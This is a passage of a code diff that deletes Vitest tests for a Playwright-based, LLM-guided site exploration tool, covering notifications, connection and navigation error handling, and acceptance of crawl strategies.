-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "click", args: { selector: "a" } }],
-          reasoning: "Exploring",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      vi.clearAllMocks();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      // Multiple notifications: crawl create, page save, completion
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-  });
-  describe("handler - error handling", () => {
-    it("handles playwright connection errors", async () => {
-      context.playwrightClient.isConnected = vi.fn().mockReturnValue(false);
-      context.playwrightClient.connect = vi.fn().mockRejectedValue(
-        new Error("Connection failed")
-      );
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBe(true);
-      expect(result.content[0].text).toContain("Error");
-    });
-    it("handles navigation errors", async () => {
-      context.playwrightClient.navigate = vi.fn().mockRejectedValue(
-        new Error("Navigation timeout")
-      );
-      await context.playwrightClient.connect();
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBe(true);
-    });
-  });
-  describe("handler - strategy", () => {
-    beforeEach(async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("accepts goal_directed strategy", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        strategy: "goal_directed",
-      });
-      expect(result.isError).toBeFalsy();
-    });
-    it("accepts breadth_first strategy", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        strategy: "breadth_first",
-      });
-      expect(result.isError).toBeFalsy();
-    });
-    it("accepts depth_first strategy", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        strategy: "depth_first",
-      });
-      expect(result.isError).toBeFalsy();
-    });
-  });
-});